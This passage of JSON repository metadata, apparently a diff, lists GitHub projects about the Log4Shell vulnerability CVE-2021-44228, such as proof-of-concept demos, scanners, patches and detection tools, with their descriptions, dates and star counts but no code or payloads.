"id": 437142703, + "name": "CVE-2021-44228-PoC", + "full_name": "TheArqsz\/CVE-2021-44228-PoC", + "owner": { + "login": "TheArqsz", + "id": 38382850, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38382850?v=4", + "html_url": "https:\/\/github.com\/TheArqsz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheArqsz\/CVE-2021-44228-PoC", + "description": null, + "fork": false, + "created_at": "2021-12-10T23:40:39Z", + "updated_at": "2021-12-17T15:29:24Z", + "pushed_at": "2021-12-17T15:29:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437155858, + "name": "log4shelldetect", + "full_name": "1lann\/log4shelldetect", + "owner": { + "login": "1lann", + "id": 804919, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/804919?v=4", + "html_url": "https:\/\/github.com\/1lann", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1lann\/log4shelldetect", + "description": "Rapidly scan filesystems for Java programs potentially vulnerable to Log4Shell (CVE-2021-44228) or \"that Log4j JNDI exploit\" by inspecting the class paths inside files", + "fork": false, + "created_at": "2021-12-11T01:08:00Z", + "updated_at": "2024-11-15T10:28:16Z", + "pushed_at": "2022-01-05T23:07:50Z", + "stargazers_count": 45, + "watchers_count": 45, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "cve-2021-45046", + "log4j", + "log4j2", + "log4shell", + "scanner", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 8, + "watchers": 45, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 437164940, + "name": "Log4j2-RCE", + "full_name": "binganao\/Log4j2-RCE", + "owner": { + "login": "binganao", + "id": 70050083, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70050083?v=4", + "html_url": "https:\/\/github.com\/binganao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/binganao\/Log4j2-RCE", + "description": "Log4j2 CVE-2021-44228 复现和回显利用", + "fork": false, + "created_at": "2021-12-11T02:08:41Z", + "updated_at": "2021-12-27T05:55:01Z", + "pushed_at": "2021-12-11T03:38:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437170557, + "name": "sample-ldap-exploit", + "full_name": "phoswald\/sample-ldap-exploit", + "owner": { + "login": "phoswald", + "id": 12776329, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12776329?v=4", + "html_url": "https:\/\/github.com\/phoswald", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/phoswald\/sample-ldap-exploit", + "description": "A short demo of CVE-2021-44228", + "fork": false, + "created_at": "2021-12-11T02:45:39Z", + "updated_at": "2024-08-12T20:18:45Z", + "pushed_at": "2021-12-13T09:20:35Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 437174339, + "name": "jndi-ldap-test-server", + "full_name": "rakutentech\/jndi-ldap-test-server", + "owner": { + "login": "rakutentech", + "id": 1415441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1415441?v=4", + "html_url": "https:\/\/github.com\/rakutentech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rakutentech\/jndi-ldap-test-server", + "description": "A minimalistic LDAP server that is meant for test vulnerability to JNDI+LDAP injection attacks in Java, especially CVE-2021-44228.", + "fork": false, + "created_at": "2021-12-11T03:08:14Z", + "updated_at": "2024-06-11T12:40:21Z", + "pushed_at": "2021-12-13T16:17:03Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "jndi", + "ldap", + "log4j", + "log4j2", + "vulnerability-detection" + ], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 437186290, + "name": "cve-2021-44228--spring-hibernate", + "full_name": "uint0\/cve-2021-44228--spring-hibernate", + "owner": { + "login": "uint0", + "id": 11325389, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11325389?v=4", + "html_url": "https:\/\/github.com\/uint0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uint0\/cve-2021-44228--spring-hibernate", + "description": "CVE-2021-44228 POC - Spring \/ Hibernate", + "fork": false, + "created_at": "2021-12-11T04:23:22Z", + "updated_at": "2021-12-15T05:36:58Z", + "pushed_at": "2021-12-11T06:25:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437214791, + "name": "log4j-vulnerability-patcher-agent", + "full_name": "saharNooby\/log4j-vulnerability-patcher-agent", + "owner": { + "login": "saharNooby", + "id": 10616794, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10616794?v=4", + "html_url": "https:\/\/github.com\/saharNooby", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/saharNooby\/log4j-vulnerability-patcher-agent", + "description": "Fixes CVE-2021-44228 in log4j by patching JndiLookup class", + "fork": false, + "created_at": "2021-12-11T07:16:21Z", + "updated_at": "2023-06-19T16:50:28Z", + "pushed_at": "2021-12-11T07:34:01Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "agent", + "bytecode", + "cve", + "fix", + "log4j", + "patch" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437215271, + "name": "log4j2burpscanner", + "full_name": "f0ng\/log4j2burpscanner", + "owner": { + "login": "f0ng", + "id": 48286013, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48286013?v=4", + "html_url": "https:\/\/github.com\/f0ng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/f0ng\/log4j2burpscanner", + "description": "CVE-2021-44228 Log4j2 BurpSuite Scanner,Customize ceye.io api or other apis,including internal networks", + "fork": false, + "created_at": "2021-12-11T07:19:11Z", + "updated_at": "2024-11-25T06:34:52Z", + "pushed_at": "2023-06-13T09:17:54Z", + "stargazers_count": 802, + "watchers_count": 802, + "has_discussions": false, + "forks_count": 111, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "burp-extensions", + "burp-plugin", + "log4j2", + "log4jshell" + ], + "visibility": "public", + "forks": 111, + "watchers": 802, + "score": 0, + "subscribers_count": 11 + }, + { + "id": 437221795, + "name": "CVE-2021-44228-Log4j-lookup-Rce", + "full_name": "M1ngGod\/CVE-2021-44228-Log4j-lookup-Rce", + "owner": { + "login": "M1ngGod", + "id": 81064151, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81064151?v=4", + "html_url": "https:\/\/github.com\/M1ngGod", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M1ngGod\/CVE-2021-44228-Log4j-lookup-Rce", + "description": null, + "fork": false, + "created_at": "2021-12-11T07:55:45Z", + "updated_at": "2023-08-15T12:51:02Z", + "pushed_at": "2021-12-11T08:07:20Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437244092, + "name": "CVE-2021-44228-Apache-Log4j-Rce", + "full_name": "byteboycn\/CVE-2021-44228-Apache-Log4j-Rce", + "owner": { + "login": "byteboycn", + "id": 14987996, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14987996?v=4", + "html_url": "https:\/\/github.com\/byteboycn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/byteboycn\/CVE-2021-44228-Apache-Log4j-Rce", + "description": null, + "fork": false, + "created_at": "2021-12-11T09:52:36Z", + "updated_at": "2023-06-20T16:41:33Z", + "pushed_at": "2021-12-11T09:53:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437248883, + "name": "log4shell-mitigation-tester", + "full_name": "lhotari\/log4shell-mitigation-tester", + "owner": { + "login": "lhotari", + "id": 66864, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66864?v=4", + "html_url": "https:\/\/github.com\/lhotari", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lhotari\/log4shell-mitigation-tester", + "description": "Log4Shell CVE-2021-44228 mitigation tester", + "fork": false, + "created_at": "2021-12-11T10:16:58Z", + "updated_at": "2021-12-21T20:05:48Z", + "pushed_at": "2021-12-13T17:24:37Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 16, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 437249303, + "name": "log4j-rce-detect-waf-bypass", + "full_name": "toramanemre\/log4j-rce-detect-waf-bypass", + "owner": { + "login": "toramanemre", + "id": 24626967, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24626967?v=4", + "html_url": "https:\/\/github.com\/toramanemre", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/toramanemre\/log4j-rce-detect-waf-bypass", + "description": "A Nuclei Template for Apache Log4j RCE (CVE-2021-44228) Detection with WAF Bypass Payloads", + "fork": false, + "created_at": "2021-12-11T10:19:01Z", + "updated_at": "2024-08-12T20:18:46Z", + "pushed_at": "2021-12-11T10:19:51Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 22, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 437261211, + "name": "CVE-2021-44228-Scanner", + "full_name": "logpresso\/CVE-2021-44228-Scanner", + "owner": { + "login": "logpresso", + "id": 14171714, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14171714?v=4", + "html_url": "https:\/\/github.com\/logpresso", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/logpresso\/CVE-2021-44228-Scanner", + "description": "Vulnerability scanner and mitigation patch for Log4j2 CVE-2021-44228", + "fork": false, + "created_at": "2021-12-11T11:18:46Z", + "updated_at": "2024-11-12T20:26:27Z", + "pushed_at": "2022-04-07T14:47:03Z", + "stargazers_count": 852, + "watchers_count": 852, + "has_discussions": false, + "forks_count": 173, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-4104", + "cve-2021-42550", + "cve-2021-44228", + "cve-2021-44832", + "cve-2021-45046", + "cve-2021-45105", + "cve-2022-23302", + "cve-2022-23305", + "cve-2022-23307", + "log4j2", + "patch", + "scanner" + ], + "visibility": "public", + "forks": 173, + "watchers": 852, + "score": 0, + "subscribers_count": 33 + }, + { + "id": 437265194, + "name": "Log4j_CVE-2021-44228", + "full_name": "vorburger\/Log4j_CVE-2021-44228", + "owner": { + "login": "vorburger", + "id": 298598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/298598?v=4", + "html_url": "https:\/\/github.com\/vorburger", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vorburger\/Log4j_CVE-2021-44228", + "description": null, + "fork": false, + "created_at": "2021-12-11T11:38:16Z", + "updated_at": "2024-08-12T20:18:46Z", + "pushed_at": "2022-02-16T21:58:54Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": true, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 437265792, + "name": "log4j2021_vul_test", + "full_name": "gauthamg\/log4j2021_vul_test", + "owner": { + "login": "gauthamg", + "id": 8748677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8748677?v=4", + "html_url": "https:\/\/github.com\/gauthamg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gauthamg\/log4j2021_vul_test", + "description": "Test the CVE https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-44228", + "fork": false, + "created_at": "2021-12-11T11:41:04Z", + "updated_at": "2021-12-13T06:49:35Z", + "pushed_at": "2021-12-13T06:49:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437273514, + "name": "CVE-2021-44228-playground", + "full_name": "b-abderrahmane\/CVE-2021-44228-playground", + "owner": { + "login": "b-abderrahmane", + "id": 10504574, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10504574?v=4", + "html_url": "https:\/\/github.com\/b-abderrahmane", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b-abderrahmane\/CVE-2021-44228-playground", + "description": null, + "fork": false, + "created_at": "2021-12-11T12:16:45Z", + "updated_at": "2024-04-29T17:48:37Z", + "pushed_at": "2024-11-21T03:29:01Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 437278973, + "name": "CVE-2021-44228-Advisories", + "full_name": "leetxyz\/CVE-2021-44228-Advisories", + "owner": { + "login": "leetxyz", + "id": 46599191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46599191?v=4", + "html_url": "https:\/\/github.com\/leetxyz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/leetxyz\/CVE-2021-44228-Advisories", + "description": "List of company advisories log4j", + "fork": false, + "created_at": "2021-12-11T12:41:38Z", + "updated_at": "2024-08-12T20:18:46Z", + "pushed_at": "2021-12-12T09:46:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437283982, + "name": "log4shell", + "full_name": "cado-security\/log4shell", + "owner": { + "login": "cado-security", + "id": 63289041, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63289041?v=4", + "html_url": "https:\/\/github.com\/cado-security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cado-security\/log4shell", + "description": "Content to help the community responding to the Log4j Vulnerability Log4Shell CVE-2021-44228", + "fork": false, + "created_at": "2021-12-11T13:03:31Z", + "updated_at": "2022-03-02T21:45:15Z", + "pushed_at": "2021-12-11T14:52:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "log4shell", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 437289885, + "name": "Log4J_0day_RCE", + "full_name": "WYSIIWYG\/Log4J_0day_RCE", + "owner": { + "login": "WYSIIWYG", + "id": 95032387, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95032387?v=4", + "html_url": "https:\/\/github.com\/WYSIIWYG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WYSIIWYG\/Log4J_0day_RCE", + "description": "Log4j-RCE (CVE-2021-44228) Proof of Concept", + "fork": false, + "created_at": "2021-12-11T13:28:52Z", + "updated_at": "2024-08-12T20:18:46Z", + "pushed_at": "2021-12-11T13:31:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437296454, + "name": "log4j-vulnerable-app-cve-2021-44228-terraform", + "full_name": "mkhazamipour\/log4j-vulnerable-app-cve-2021-44228-terraform", + "owner": { + "login": "mkhazamipour", + "id": 23025217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23025217?v=4", + "html_url": "https:\/\/github.com\/mkhazamipour", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mkhazamipour\/log4j-vulnerable-app-cve-2021-44228-terraform", + "description": "A Terraform to deploy vulnerable app and a JDNIExploit to work with CVE-2021-44228", + "fork": false, + "created_at": "2021-12-11T13:56:28Z", + "updated_at": "2022-01-25T17:42:11Z", + "pushed_at": "2021-12-11T14:53:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437310436, + "name": "log4j-CVE-2021-44228-Public-IoCs", + "full_name": "Sh0ckFR\/log4j-CVE-2021-44228-Public-IoCs", + "owner": { + "login": "Sh0ckFR", + "id": 10033649, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10033649?v=4", + "html_url": "https:\/\/github.com\/Sh0ckFR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sh0ckFR\/log4j-CVE-2021-44228-Public-IoCs", + "description": "Public IoCs about log4j CVE-2021-44228", + "fork": false, + "created_at": "2021-12-11T14:54:45Z", + "updated_at": "2024-08-12T20:18:46Z", + "pushed_at": "2021-12-17T10:14:30Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437316134, + "name": "log4j2-vulnerable-spring-app", + "full_name": "zzzz0317\/log4j2-vulnerable-spring-app", + "owner": { + "login": "zzzz0317", + "id": 16097046, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16097046?v=4", + "html_url": "https:\/\/github.com\/zzzz0317", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zzzz0317\/log4j2-vulnerable-spring-app", + "description": "CVE-2021-44228", + "fork": false, + "created_at": "2021-12-11T15:18:42Z", + "updated_at": "2023-10-23T06:12:54Z", + "pushed_at": "2021-12-13T02:14:14Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437319619, + "name": "test-44228", + "full_name": "datadavev\/test-44228", + "owner": { + "login": "datadavev", + "id": 605409, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/605409?v=4", + "html_url": "https:\/\/github.com\/datadavev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/datadavev\/test-44228", + "description": "Simple demo of CVE-2021-44228", + "fork": false, + "created_at": "2021-12-11T15:33:17Z", + "updated_at": "2021-12-11T15:42:35Z", + "pushed_at": "2022-01-04T16:56:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437323133, + "name": "JndiRemover", + "full_name": "LemonCraftRu\/JndiRemover", + "owner": { + "login": "LemonCraftRu", + "id": 73554117, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73554117?v=4", + "html_url": "https:\/\/github.com\/LemonCraftRu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LemonCraftRu\/JndiRemover", + "description": "Небольшой мод направленный на устранение уязвимости CVE-2021-44228", + "fork": false, + "created_at": "2021-12-11T15:48:03Z", + "updated_at": "2022-01-08T19:26:15Z", + "pushed_at": "2022-02-07T20:44:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "jndi-exploit", + "log4j", + "minecraft-mod" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437327955, + "name": "Log4j-Rec-CVE-2021-44228", + "full_name": "zhangxvx\/Log4j-Rec-CVE-2021-44228", + "owner": { + "login": "zhangxvx", + "id": 19684449, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19684449?v=4", + "html_url": "https:\/\/github.com\/zhangxvx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhangxvx\/Log4j-Rec-CVE-2021-44228", + "description": "Apache Log4j CVE-2021-44228 漏洞复现", + "fork": false, + "created_at": "2021-12-11T16:08:34Z", + "updated_at": "2021-12-12T03:50:45Z", + "pushed_at": "2021-12-12T03:49:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437327995, + "name": "Log4j-CVE-Detect", + "full_name": "darkarnium\/Log4j-CVE-Detect", + "owner": { + "login": "darkarnium", + "id": 3048394, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3048394?v=4", + "html_url": "https:\/\/github.com\/darkarnium", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/darkarnium\/Log4j-CVE-Detect", + "description": "Detections for CVE-2021-44228 inside of nested binaries", + "fork": false, + "created_at": "2021-12-11T16:08:47Z", + "updated_at": "2024-08-12T20:18:47Z", + "pushed_at": "2021-12-18T22:20:25Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "binary", + "cve-2021-44228", + "cve-2021-45046", + "detection", + "devops", + "python", + "sca", + "security" + ], + "visibility": "public", + "forks": 6, + "watchers": 34, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 437381453, + "name": "CVE-2021-44228_Example", + "full_name": "chilliwebs\/CVE-2021-44228_Example", + "owner": { + "login": "chilliwebs", + "id": 6079309, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6079309?v=4", + "html_url": "https:\/\/github.com\/chilliwebs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chilliwebs\/CVE-2021-44228_Example", + "description": null, + "fork": false, + "created_at": "2021-12-11T20:25:08Z", + "updated_at": "2022-01-03T13:51:27Z", + "pushed_at": "2021-12-15T20:27:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437397347, + "name": "f5-waf-enforce-sig-CVE-2021-44228", + "full_name": "irgoncalves\/f5-waf-enforce-sig-CVE-2021-44228", + "owner": { + "login": "irgoncalves", + "id": 23459099, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23459099?v=4", + "html_url": "https:\/\/github.com\/irgoncalves", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/irgoncalves\/f5-waf-enforce-sig-CVE-2021-44228", + "description": "This enforces signatures for CVE-2021-44228 across all policies on a BIG-IP ASM device", + "fork": false, + "created_at": "2021-12-11T21:59:19Z", + "updated_at": "2024-04-07T21:37:20Z", + "pushed_at": "2021-12-15T18:56:57Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437407625, + "name": "log4j-docker-vaccine", + "full_name": "jeffbryner\/log4j-docker-vaccine", + "owner": { + "login": "jeffbryner", + "id": 566889, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/566889?v=4", + "html_url": "https:\/\/github.com\/jeffbryner", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jeffbryner\/log4j-docker-vaccine", + "description": "docker compose solution to run a vaccine environment for the log4j2 vulnerability CVE-2021-44228", + "fork": false, + "created_at": "2021-12-11T23:06:23Z", + "updated_at": "2022-05-22T02:50:49Z", + "pushed_at": "2021-12-12T00:15:23Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437419010, + "name": "log4j-detector", + "full_name": "mergebase\/log4j-detector", + "owner": { + "login": "mergebase", + "id": 73667397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73667397?v=4", + "html_url": "https:\/\/github.com\/mergebase", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mergebase\/log4j-detector", + "description": "A public open sourced tool. Log4J scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any application. It is able to even find Log4J instances that are hidden several layers deep. Works on Linux, Windows, and Mac, and everywhere else Java runs, too! TAG_OS_TOOL, OWNER_KELLY, DC_PUBLIC", + "fork": false, + "created_at": "2021-12-12T00:29:03Z", + "updated_at": "2024-11-12T20:26:27Z", + "pushed_at": "2022-03-10T18:44:50Z", + "stargazers_count": 638, + "watchers_count": 638, + "has_discussions": false, + "forks_count": 98, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "cve-2021-45046", + "cve-2021-45105", + "cybersecurity", + "detector", + "log4j", + "log4shell", + "pentest", + "sca", + "scanner", + "vulnerability-scanner" + ], + "visibility": "public", + "forks": 98, + "watchers": 638, + "score": 0, + "subscribers_count": 28 + }, + { + "id": 437426248, + "name": "log4j2-rce-poc", + "full_name": "unlimitedsola\/log4j2-rce-poc", + "owner": { + "login": "unlimitedsola", + "id": 3632663, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3632663?v=4", + "html_url": "https:\/\/github.com\/unlimitedsola", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/unlimitedsola\/log4j2-rce-poc", + "description": "A bare minimum proof-of-concept for Log4j2 JNDI RCE vulnerability (CVE-2021-44228\/Log4Shell).", + "fork": false, + "created_at": "2021-12-12T01:23:45Z", + "updated_at": "2023-04-17T21:10:43Z", + "pushed_at": "2021-12-12T09:59:26Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "log4j2", + "log4shell", + "poc", + "proof-of-concept", + "rce", + "remote-code-execution" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437426359, + "name": "log4j2burpscanner", + "full_name": "Jeromeyoung\/log4j2burpscanner", + "owner": { + "login": "Jeromeyoung", + "id": 39945364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4", + "html_url": "https:\/\/github.com\/Jeromeyoung", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jeromeyoung\/log4j2burpscanner", + "description": "CVE-2021-44228,log4j2 burp插件 Java版本,dnslog选取了非dnslog.cn域名", + "fork": false, + "created_at": "2021-12-12T01:24:39Z", + "updated_at": "2024-10-01T03:52:44Z", + "pushed_at": "2021-12-11T10:39:41Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 38, + "watchers": 30, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437426386, + "name": "hotpatch-for-apache-log4j2", + "full_name": "corretto\/hotpatch-for-apache-log4j2", + "owner": { + "login": "corretto", + "id": 44104058, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44104058?v=4", + "html_url": "https:\/\/github.com\/corretto", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corretto\/hotpatch-for-apache-log4j2", + "description": "An agent to hotpatch the 